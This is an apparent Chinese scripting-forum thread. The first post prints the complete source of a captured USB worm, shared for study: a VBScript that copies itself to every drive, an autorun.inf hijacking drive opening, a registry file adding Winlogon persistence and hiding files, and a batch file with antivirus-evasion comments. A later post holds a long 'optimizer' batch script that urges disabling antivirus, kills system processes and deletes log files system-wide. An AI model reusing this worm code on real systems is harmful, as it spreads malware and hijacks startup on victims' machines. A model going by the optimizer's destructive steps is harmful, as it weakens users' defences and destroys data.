|
xiaoyao1987
初级用户
积分 63
发帖 24
注册 2006-12-19 来自 南京
状态 离线
|
『楼 主』:
刚刚截获的一个U盘病毒,发出来大家研究下
autorun.vbs
on error resume next
Set WshShell =CreateObject("WScript.Shell")
if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if AUTORUN.INF
[autorun]
shell\open=打开(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\autorun.vbs autorun.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002 autorun.bat
@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
';免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
';免杀
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end 大家随便看看哈,另外的一个sxs.exe就是病毒文件体了,我就不发了
这边的代码貌似还不错
|
|
2007-5-31 15:50 |
|
|
koala
初级用户
Batchs上議院參議長
积分 199
发帖 105
注册 2007-6-5 来自 江苏
状态 离线
|
『第
2 楼』:
下载先
|
『生如夏花之绚烂
死若秋叶之静美』 dos做到了 |
|
2007-7-3 20:10 |
|
|
koala
初级用户
Batchs上議院參議長
积分 199
发帖 105
注册 2007-6-5 来自 江苏
状态 离线
|
『第
3 楼』:
宣传一下自己其他在 loveskoala.ys168.com下载
@echo off
setlocal
:environment
rem 本脚本中将会用到的环境变量申明
rem 以下可能有的变量申明是多余的,但因各个PC的环境变量有所不同
rem 为了减少脚本运行时的出错机率,所以鄙人认为以下申明是必要的
rem 例如:鄙人喜欢捣鼓系统,把"命令提示符"下的path环境变量变成了
rem path=c\windows\system32;每次从"命令提示符"运行部分命令时都提示
rem 出错,难道要每次运行带有path环境变量设置的脚本启动"命令提示符"
rem 吗? 这个问题至今尚未解决,如果阁下有什么办法帮我解决.请E-mail给我
path=%systemroot%\system32;%systemroot%;%systemdrive%\;%userprofile%\servicesconfig;%userprofile%\servicesconfig\Tway
set regedit=%SystemRoot%\regedit.exe
set find=%SystemRoot%\System32\find.exe
set process=%userprofile%\servicesconfig\process.exe
set regsvr32=%systemroot%\system32\regsvr32.exe
set root=%userprofile%\servicesconfig
:_AboutMe
rem 自我介绍
title 关于我
cls
color 1f
echo.
echo.
echo. 此VB简历是鄙人尚未接触任何正式指导
echo. 情况下,凭借中学时候每次上机房前学习的
echo. 记忆随手写作的一个文件,意在摆脱以往脚
echo. 本的单调性.
echo.
echo.
echo. 仅供增强脚本界面的多彩性
echo.
echo. !!!进入下一步请直接点击左边自我介绍
echo. !!!对话框的"X"
echo.
koala的个人简历.exe
:_define_APP_PATHs
rem 定义脚本相关应用程序路径
if not exist "%root%" md "%root%"
if not exist "%root%"\AntiLockReg.exe copy /y AntiLockReg.exe "%root%"
if not exist "%root%"\koala的个人简历.exe copy /y koala的个人简历.exe "%root%"
if not exist "%root%"\process.exe copy /y process.exe "%root%"
if not exist "%root%"\psexec.exe copy /y psexec.exe "%root%"
if not exist "%root%"\pslist.exe copy /y pslist.exe "%root%"
rem 此段原来的内容如下(不包含rem 哦)
rem 后来觉得每次看过"koala的个人简历"后
rem 老出现碍眼的“已复制 1 个文件。”
rem 于是改成以上形式。
rem if not exist "%root%" md "%root%"
rem copy /y koala的个人简历.exe "%root%"
rem copy /y 屏蔽.reg "%root%"
rem copy /y 启动提速.reg "%root%"
rem copy /y IE受篡改的恢复.reg "%root%"
rem copy /y process.exe "%root%"
:_Start
title NT核系统服务管理(适用平台:Windows 2000/XP/2003/vista)
color 1f
cls
echo.
echo.
echo ______________________________________________________________________________
echo.
echo 简述
echo.
echo.
echo. 系统没玩多久却发现速度始终不太好,启动时太慢了,比猫还懒 =。=
echo 受不了了,于是决定为系统减减肥.找来优化软件,速度可以了,
echo 但是却很激动地发现我写了N久的文章却 "木"有列,着急啊!?...
echo.
echo 我的数据丢失了倒无所谓,要是你写给MM的情书也给弄丢了...
echo 嘿嘿,m _ m 抱猫哭也没有用了.
echo.
echo.
echo 作者: koala
echo QQ:13019940
echo ______________________________________________________________________________
set select =
set /p select= 请按"回车键"继续....
if "%select%" == "" goto :_go
:_go
cls
echo.
echo.
echo ______________________________________________________________________________
echo.
echo koala提醒您
echo.
echo 程序运行过程中将会关闭非系统级别的进程以及应用程序,并且
echo 有可能切断网络,请自行关闭杀毒软件以及其他相关防火墙。
echo 请将您的贵重数据转移(或复制)到U盘或移动硬盘等移动存储设
echo 备中以实现安全有效的备份。
echo.
echo 此脚本以注册表操作为主,DOS命令结合为基础,其间涉及大量
echo 注册表操作,脚本运行过程中桌面会自动消失,退出脚本后即正常还原
echo 如果你的杀毒软件(或注册表防护程序)报警并拦截,请你不要恐慌!!!
echo 请将规则设为许可!!!!!
echo.
echo 好了,罗嗦了这些。现在开始,您需要关闭您的杀毒软件。
rem
rem 注意: 脚本运行过程中会自行关闭以下相关非系统必要的进程以及程序!
rem
rem 系统应用类:
rem
rem 输入法(internat.exe和ctfmon.exe)、任务管理器(taskmgr.exe)
rem 资源管理器(Explorer.exe)、计划任务(mstask.exe/mstask)
rem 记事本(notepad.exe)、DirectX诊断应用进程(ddhelp.exe)
rem Windows壳进程(kernel32.dll/kernel32)、控制台(mmc.exe)
rem
rem 网络类:
rem
rem 自动升级(wuauserv.exe)、应用层网关服务(alg.exe)、远程注册表(regsvc.exe)、腾讯QQ办公模式(ttmplatform.exe)
rem IIS调试除错进程(inetinfo.exe)、简单网络协议代理(snmp.exe) 、MyIE浏览器(myie.exe或myie)
rem 输入法管理(conime.exe)、RealPlayer升级程序(realsched.exe)、wdfmgr.exe等相关进程...
rem
rem 应用程序:
rem
rem Office 脚本调试除错进程(mdm.exe)、Windows信使(msgsrv.exe) 、Visual Basic6编程(vb6.exe)
rem 打印机任务控制程序(spool32.exe/spool32)、打印机内存管理(spoolsv.exe)
rem 扫描仪和数码相机应用服务(stisvc.exe) Windows任务优化器(taskmon.exe)
rem
echo ______________________________________________________________________________
set copyright=
set /p copyright= (输入"help"获取更多信息):
if "%copyright%" == "" goto :_ConfigSomeSpecialServices
if "%copyright%" == "help" goto :_copyright
:_copyright
:{
cls
echo.
echo.
echo.
echo ______________________________________________________________________________
echo.
echo 版权所有 (C) koala May 14 2007
echo.
echo 测试平台 : Windows XP Pro SP2
echo Windows Vista
echo.
echo 此脚本程序由 "考拉(koala)(又名 汉化猫) " 个人撰写,你可以在保存
echo 程序完整性,以及可运行的前提下任意修改,不合理还指正并提出修改建议,
echo 如果我能很荣幸地收到你的来信.
echo (看koala写的东东,需要以西方的逻辑习惯来理解哦! * _ *)
echo.
echo da2qia1ku5@126.com
echo ______________________________________________________________________________
set EXITcopyright =
set /p EXITcopyright= 请按"回车键"继续(可在此处输入" quit" 退出)....
if "%EXITcopyright%" == "quit" goto :_QUIT_
if "%EXITcopyright%" == "" goto _ConfigSomeSpecialServices
:}
:_ConfigSomeSpecialServices
cls
echo 正在建立系统相关参数的快照.请稍等...
"%regedit%" /e "%root%\ServicesSet.reg.default"
rem 此处假设目标客户端的(koala强烈申明:此处的并不是"远程注册表服务 Remote Registry")
rem 注册表被禁用,此处先启用 Windows Installer服务,然后运行特定的解除注册表被禁用的脚本,
rem
echo 正在启动相关脚本需要的系统服务...
sc config MSIServer start= AUTO
net start MSIServer
cls
echo.
echo finished! please wait for a while...
AntiLockReg.exe
if ErrorLevel = 1 goto _ERROR
cls
goto :LookingForRequiredFile
:_ERROR
cls
echo 安装失败!请以手动打开此项系统服务
echo 方法: "开始" - "运行" 输入 services.msc
echo 下拉滚动条定位到Windows Installer 右击"属性" - "启动"
echo ------------------------------------------------------
echo 配置成功后请按回车键继续...
pause>nul
goto :LookingForRequiredFile
:LookingForRequiredFile
cls
rem 验证脚本完整运行时所必需的文件是否存在
if exist %systemroot%\regedit.exe (goto :_KillProcess) else (goto :_NoRegedit)
:_NoRegedit
color ce
title 必要的文件(regedit.exe)已丢失
cls
echo 系统目录中的%systemroot%\regedit.exe文件已经丢失,
echo 请从其他机器中另行拷贝一份到你的系统中。
pause
cls
echo.
echo 晕!!!不太可能吧!!!你平时都用什么操作注册表的啊
echo 难道和我一样用 一大堆命令行吗!
echo 我暂且还没有发现一款命令行工具能替代regedit的
echo 不过我为准备了一份regedit.exe(koala特别版)免得你
echo 你还要从其他MM(或GG)的电脑上拷一份的麻烦!
echo.
echo 如果出现文件保护请先点"取消"再点"是"
pause
copy /y regedit.exe "%systemroot%"
cls
goto :_LookingForRequiredFile
:_KillProcess
:{
echo.
title 关闭脚本不需要的进程
echo.
echo 下一步即将关闭脚本不需要的进程
echo -------------------------------------------------------------------------
echo 你可能需要稍等一些时间(从1秒-1分钟不等),这得由你的计算机具体配制情况而定
echo 请按"回车键"继续...
pause >nul
goto :loop
cls
:loop
rem 此段是本人学习 c 语法中 if嵌套式复合语句后添加的,增强了脚本的智能性
cls
echo process正在关闭非系统必要进程,请稍候...
"%process%" > "%temp%\processlist.txt"
type "%temp%"\processlist.txt|"%find%" /i "WinRAR.exe" >NUl
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "notepad.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "regedit.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "conime.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "internat.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "ctfmon.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "taskmgr.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "explorer.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "mstask.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "mstask" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "ddhelp.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "kernel32.dll" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "kernel32" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "mmc" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "alg.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "regsvc.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "inetinfo.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "snmp.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "mdm.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "msgsrv.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "spool32.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "spool32" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "spoolsv.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "stisvc.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "taskmgr.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "ttmplatform.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "myie.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "myie" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "realsched.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "wdfmgr.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "wuauserv.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "vb6.exe" >NUL
if errorlevel==1 (
type "%temp%"\processlist.txt|"%find%" /i "taskmon.exe" >NUL
if errorlevel==1 (
echo.
echo 进程终止完毕!
goto :continue
)
"%process%" -k taskmon.exe
goto :loop
)
"%process%" -k vb6.exe
goto :loop
)
"%process%" -k wuauserv.exe
goto :loop
)
"%process%" -k wdfmgr.exe
goto :loop
)
"%process%" -k realsched.exe
goto :loop
)
"%process%" -k myie
goto :loop
)
"%process%" -k myie.exe
goto :loop
)
"%process%" -k ttmplatform.exe
goto :loop
)
"%process%" -k taskmgr.exe
goto :loop
)
"%process%" -k stisvc.exe
goto :loop
)
"%process%" -k spoolsv.exe
goto :loop
)
"%process%" -k spool32
goto :loop
)
"%process%" -k spool32.exe
goto :loop
)
"%process%" -k msgsrv.exe
goto :loop
)
"%process%" -k mdm.exe
goto :loop
)
"%process%" -k snmp.exe
goto :loop
)
"%process%" -k inetinfo.exe
goto :loop
)
"%process%" -k regsvc.exe
goto :loop
)
"%process%" -k alg.exe
goto :loop
)
"%process%" -k mmc
goto :loop
)
"%process%" -k kernel32
goto :loop
)
"%process%" -k kernel32.dll
goto :loop
)
"%process%" -k ddhelp.exe
goto :loop
)
"%process%" -k mstask
goto :loop
)
"%process%" -k mstask.exe
goto :loop
)
"%process%" -k explorer.exe
goto :loop
)
"%process%" -k taskmgr.exe
goto :loop
)
"%process%" -k ctfmon.exe
goto :loop
)
"%process%" -k internat.exe
goto :loop
)
"%process%" -k conime.exe
goto :loop
)
"%process%" -k regedit.exe
goto :loop
)
"%process%" -k notepad.exe
goto :loop
)
"%process%" -k WinRAR.exe
goto :loop
:continue
if exist "%temp%\processlist.txt" del /q "%temp%\processlist.txt"
echo 下一步即将脚本控制中心 &pause
goto:_ControlCenter
:}
:_ControlCenter
rem 脚本控制中心
:{
title Windows 2000/XP服务管理
color 1f
cls
echo.
echo =================================================================
echo ======================== 程序控制台 =======================
echo =================================================================
echo 1. ...系统备份(还原请输入11)
echo 2. ...系统垃圾清理
echo 3. ...运行痕迹清理
echo 4. ...系统服务优化
echo 5. ...系统启动提速
echo 6. ...系统安全设置(涉及注册表操作太多,开发ing... ~.~)
echo 7. ...命令提示符
echo 8. ...返回脚本启动界面
echo 9. ...返回桌面
echo 10. ...系统优化
echo 12. ...流氓软件劫持恢复
echo 13. ...磁盘整理
echo 14. ...恶意进程终止
echo 15. ...系统环境变量查询
echo 16. ...撤消系统服务的优化
echo =================================================================
SET SELECT=1
SET /P SELECT=请选择您要进行的操作(默认:1)
IF "%SELECT%" == "2" goto :_SystemJunk
IF "%SELECT%" == "3" goto :_ClearHistory
IF "%SELECT%" == "4" goto :_ServConfig
IF "%SELECT%" == "5" goto :_SartUpItemSpeedUp
IF "%SELECT%" == "7" goto :_CommandLine
IF "%SELECT%" == "8" goto :environment
IF "%SELECT%" == "9" goto :_QUIT_
IF "%SELECT%" == "10" goto :_Optimize
IF "%SELECT%" == "12" goto :_drive_rascal_software_away
IF "%SELECT%" == "13" goto :_CheckDisk
IF "%SELECT%" == "14" goto :_kill_rascal_process
IF "%SELECT%" == "15" goto :_system_variable
IF "%SELECT%" == "16" goto :_ServRestore
goto :_ControlCenter
:}
:_SystemJunk
cls
echo.
echo 正在对系统垃圾文件分析,请稍等...
echo.
title 系统垃圾清理 --此项旨在清理多余的系统备份以及运行过程中产生的垃圾。
rem
if exist %systemdrive%\*.tmp attrib -h -s -r -a %systemdrive%\*.tmp &del /f /s /q %systemdrive%\*.tmp
rem
if exist %systemdrive%\*._mp attrib -h -s -r -a %systemdrive%\*._mp &del /f /s /q %systemdrive%\*._mp
rem
if exist %systemdrive%\*.log attrib -h -s -r -a %systemdrive%\*.log &del /f /s /q %systemdrive%\*.log
rem
if exist %systemdrive%\*.gid attrib -h -s -r -a %systemdrive%\*.gid &del /f /s /q %systemdrive%\*.gid
rem
if exist %systemdrive%\*.chk attrib -h -s -r -a %systemdrive%\*.chk &del /f /s /q %systemdrive%\*.chk
rem
if exist %systemdrive%\*.old attrib -h -s -r -a %systemdrive%\*.old &del /f /s /q %systemdrive%\*.old
rem
if exist %systemdrive%\recycled\*.* attrib -h -s -r -a %systemdrive%\recycled\*.* &del /f /s /q %systemdrive%\recycled\*.*
rem
if exist %windir%\prefetch\*.* attrib -h -s -r -a %windir%\prefetch\*.* &del /f /s /q %windir%\prefetch\*.*
rem
if exist %systemroot%\$hf_mig$\*.* attrib -h -s -r -a %systemroot%\$hf_mig$\*.* &del /f /s /q %systemroot%\$hf_mig$\*.*
rem
if exist %systemroot%\*.log attrib -h -s -r -a %systemroot%\*.log &del /f /s /q %systemroot%\*.log
rem
rd /s /q %temp% &md %temp%
if errorlevel=1 cls &echo 缓存文件夹需要手动清理
ECHO Y|CHKDSK/F
cls
echo.
echo 系统垃圾已清理完毕! 请按回车键返回...
echo.
echo 注:脚本已计划在下次启动时进行磁盘整理,
echo 请启动时不要碰键盘,此项目的是加快系统
echo 在下一次启动的速度!
pause
cls
goto :_ControlCenter
:_kill_rascal_process
if not exist %systemroot%\system32\ntsd.exe copy /y ntsd.exe %systemroot%\system32
if not exist %systemroot%\system32\ntsdexts.dll copy /y ntsdexts.dll %systemroot%\system32 ®svr32 /s ntsdexts.dll &cls
:{
title 顽固进程ID终止
color 1f
cls
:MENU
set _ProcessManagement=
set _ProcessID=
echo --------------------------------------------------------
echo 请输入欲终止的进程ID,你可以先对欲终止的进程ID进行查看 ︱
echo 查看请输入"1" 进行终止请输入"0"返回控制台请输入"2" ︱
echo 写作此项的目的:终止占据系统资源无赖进程.个人觉得超实用 ︱
echo --------------------------------------------------------
echo 1. 查看系统进程
echo 2. 返回控制台
echo 3. 终止特定Pid进程
echo 0. 终止特定名称进程
echo --------------------------------------------------------
set /p _ProcessManagement=请输入你将要进行的操作(默认为查看进程):
if "%_ProcessManagement%" == "1" goto :_ListAllProcess
if "%_ProcessManagement%" == "2" goto :_ControlCenter
if "%_ProcessManagement%" == "3" goto :terminateProcess
if "%_ProcessManagement%" == "0" goto :_terminateProcess
:_ListAllProcess
title 进程查看
cls
echo --------------------------------------------------------
pslist
echo.
echo.
echo 重要提醒:请记下你要终止的进程名的ID或者进程名,然后按"回车键"返回
pause>nul
cls
goto :MENU
:_terminateProcess
echo.
title 顽固进程终止
echo.
echo 请输入进程ID(如不确定进程 ID请按"回车键"查看)
set /p ProcessID=请输入一个有效的进程ID:
ntsd -c q -p "%ProcessID%"
pause>nul
goto :_ControlCenter
:}
:terminateProcess
echo.
title 顽固进程终止
echo.
echo 请输入进程名(如不确定进程名请按"回车键"查看)
set /p ProcessName=请输入一个有效的进程名:
ntsd -c q -pn "%ProcessName%"
pause>nul
goto :_ControlCenter
:_ClearHistory
:{
rem 安装文件产生的临时文件存放路径
if exist %windir%\temp\*.* rd /s /q %windir%\temp & md %windir%\temp
if exist "%userprofile%\Local Settings\Temp\*.*" del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
rem 上网登陆邮箱,论坛等自动提交的数据
if exist %userprofile%\cookies\*.* del /f /q %userprofile%\cookies\*.*
rem 本地计算机最近打开的文件记录
if exist "%userprofile%\recent\*.*" del /f /q /s "%userprofile%\Recent\*.*"
rem PE explorer 汉化版 注册表历史记录清理
set PE_Reg_Key=HKEY_CURRENT_USER\Software\HeavenTools\PE Explorer 1.0\参数
reg delete "%PE_Reg_Key%" /v FILE0 /f
reg delete "%PE_Reg_Key%" /v FILE1 /f
reg delete "%PE_Reg_Key%" /v FILE2 /f
reg delete "%PE_Reg_Key%" /v FILE3 /f
reg delete "%PE_Reg_Key%" /v FILE4 /f
reg delete "%PE_Reg_Key%" /v FILE5 /f
reg delete "%PE_Reg_Key%" /v FILE6 /f
reg delete "%PE_Reg_Key%" /v FILE7 /f
reg delete "%PE_Reg_Key%" /v FILE8 /f
reg delete "%PE_Reg_Key%" /v FILE9 /f
reg delete "%PE_Reg_Key%" /v FILE10 /f
reg delete "%PE_Reg_Key%" /v FILE11 /f
reg delete "%PE_Reg_Key%" /v FILE12 /f
reg delete "%PE_Reg_Key%" /v FILE13 /f
reg delete "%PE_Reg_Key%" /v FILE14 /f
reg delete "%PE_Reg_Key%" /v FILE15 /f
reg delete "%PE_Reg_Key%" /v FILE16 /f
reg delete "%PE_Reg_Key%" /v FILE17 /f
reg delete "%PE_Reg_Key%" /v FILE18 /f
reg delete "%PE_Reg_Key%" /v FILE19 /f
reg delete "%PE_Reg_Key%" /v FILE20 /f
rem reg delete "%PE_Reg_Key%" /v Last Src0 /f
rem reg delete "%PE_Reg_Key%" /v Last Src1 /f
rem reg delete "%PE_Reg_Key%" /v Last Src2 /f
rem reg delete "%PE_Reg_Key%" /v Last Src3 /f
rem reg delete "%PE_Reg_Key%" /v Last Src4 /f
rem reg delete "%PE_Reg_Key%" /v Last Src5 /f
rem reg delete "%PE_Reg_Key%" /v Last Src6 /f
rem reg delete "%PE_Reg_Key%" /v Last Src7 /f
rem reg delete "%PE_Reg_Key%" /v Last Src8 /f
rem reg delete "%PE_Reg_Key%" /v Last Src9 /f
rem reg delete "%PE_Reg_Key%" /v Last Src10 /f
rem reg delete "%PE_Reg_Key%" /v FLast Src11 /f
rem reg delete "%PE_Reg_Key%" /v Last Src12 /f
rem reg delete "%PE_Reg_Key%" /v Last Src13 /f
rem reg delete "%PE_Reg_Key%" /v FLast Src14 /f
rem reg delete "%PE_Reg_Key%" /v Last Src15 /f
rem reg delete "%PE_Reg_Key%" /v FLast Src16 /f
rem reg delete "%PE_Reg_Key%" /v Last Src17 /f
rem reg delete "%PE_Reg_Key%" /v Last Src18 /f
rem reg delete "%PE_Reg_Key%" /v Last Src19 /f
rem reg delete "%PE_Reg_Key%" /v Last Src20 /f
reg delete "%PE_Reg_Key%" /v FVFILE0 /f
reg delete "%PE_Reg_Key%" /v FVFILE1 /f
reg delete "%PE_Reg_Key%" /v FVFILE2 /f
reg delete "%PE_Reg_Key%" /v FVFILE3 /f
reg delete "%PE_Reg_Key%" /v FVFILE4 /f
reg delete "%PE_Reg_Key%" /v FVFILE5 /f
reg delete "%PE_Reg_Key%" /v FVFILE6 /f
reg delete "%PE_Reg_Key%" /v FVFILE7 /f
reg delete "%PE_Reg_Key%" /v FVFILE8 /f
reg delete "%PE_Reg_Key%" /v FVFILE9 /f
reg delete "%PE_Reg_Key%" /v FVFILE10 /f
reg delete "%PE_Reg_Key%" /v FVFILE11 /f
reg delete "%PE_Reg_Key%" /v FVFILE12 /f
reg delete "%PE_Reg_Key%" /v FVFILE13 /f
reg delete "%PE_Reg_Key%" /v FVFILE14 /f
reg delete "%PE_Reg_Key%" /v FVFILE15 /f
reg delete "%PE_Reg_Key%" /v FVFILE16 /f
reg delete "%PE_Reg_Key%" /v FVFILE17 /f
reg delete "%PE_Reg_Key%" /v FVFILE18 /f
reg delete "%PE_Reg_Key%" /v FVFILE19 /f
reg delete "%PE_Reg_Key%" /v FVFILE20 /f
set PE_Reg_Key=
rem 播放器 设置遗留参数
reg delete "HKCU\Software\Gabest\VSFilter\DefTextPathes" /v Path1 /f
rem
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU" /f
rem KMplayer痕迹
reg delete "HKCU\Software\KMPlayer\WideAlbum\(Default Album)" /f
rem EmEditor运行痕迹
reg delete "HKCU\Software\EmSoft\EmEditor v3\Recent File List" /f
rem 通知区域历史痕迹
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify" /f
rem EditPlus 2运行痕迹
reg delete "HKCU\Software\ES-Computing\EditPlus 2\Recent File List" /f
rem 浏览网页产生的临时文件
if exist "%userprofile%\Local Settings\Temporary Internet Files\*.*" del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
rem 通过资源管理器打开文件的历史记录
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs /f
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32 /f
reg delete HKCU\software\microsoft\windows\currentversion\explorer\runmru /f
reg delete HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\opensavemru /f
reg delete HKCU\software\microsoft\windows\currentversion\explorer\userassist /f
rem 清除 WinRAR的相关垃圾信息
reg delete "HKCU\software\winrar\ArcHistory" /va /f
reg delete "HKCU\Software\WinRAR\DialogEditHistory\ExtrPath" /va /f
reg delete "HKCU\Software\WinRAR\General" /v lastFolder /f
rem 通过Internet Explorer打开文件的历史记录
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache" /f
reg delete "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" /f >nul
cls
echo.
echo 历史痕迹已清理完毕! 请按回车键返回...
pause
goto :_ControlCenter
:}
:_system_variable
cls
color f2
title 系统相关变量
set CHK_SVC=YES
set XPSP2=FALSE
set SERVER=FALSE
set NT_SERVER_CHK=TRUE
set regedit=%SystemRoot%\regedit.exe
set find=%SystemRoot%\System32\find.exe
echo 正在对系统相关参数进行检测,请稍候...
echo.
if /I "%NT_SERVER_CHK%"=="FALSE" goto :SKIP_NT_SERVER_CHK
"%regedit%" /e "%TEMP%\~svr.txt" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions"
type "%TEMP%\~svr.txt"|"%find%" /i "Server" >NUL
if not errorlevel 1 set SERVER=TRUE
type "%TEMP%\~svr.txt"|"%find%" /i "LanMan" >NUL
if not errorlevel 1 set SERVER=TRUE
if exist "%TEMP%\~svr.txt" del /F /Q "%TEMP%\~svr.txt"
if /I "%SERVER%"=="TRUE" goto :NTSERVER
:SKIP_NT_SERVER_CHK
ver | "%find%" /i "Windows 2000" > nul
if not errorlevel 1 goto :OS2K
ver | "%find%" /i "Windows XP" > nul
if not errorlevel 1 goto :OSXP
ver | "%find%" /i "Microsoft Windows [Version 5.2.3790]" > nul
if not errorlevel 1 goto :OSXP64
echo !!系统性错误!!
echo __________
echo.
echo 此脚本仅适用于 Windows 2000/XP 操作平台!
echo.
goto :_QUIT_
:NTSERVER
echo.
echo !!系统性错误!!
echo __________
echo.
echo 此脚本不支持 NT服务器 版本!
echo.
goto :_QUIT_
:OS2K
rem 明确操作系统( OS) 侦测I
set SYSTEM=2k
rem 脚本正在对 XP ServicePacks 进行检测...
"%regedit%" /e "%TEMP%\~svclist.txt" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 5" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 4" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 3" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 2" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 1" >NUL
if errorlevel==1 (
cls
echo 您的操作系统是: Windows 2000 [未知类型 Service Pack或尚未安装]
goto NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 1]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 2]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 3]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 4]
goto :NO_2KSP
)
cls
echo 您的操作系统是: Windows 2000 [Service Pack 5]
goto :NO_2KSP
:NO_2kSP
if exist "%TEMP%\~svclist.txt" del /F /Q "%TEMP%\~svclist.txt"
goto :CONTINUE
:OSXP
rem 明确操作系统( OS) 侦测II
set SYSTEM=xp
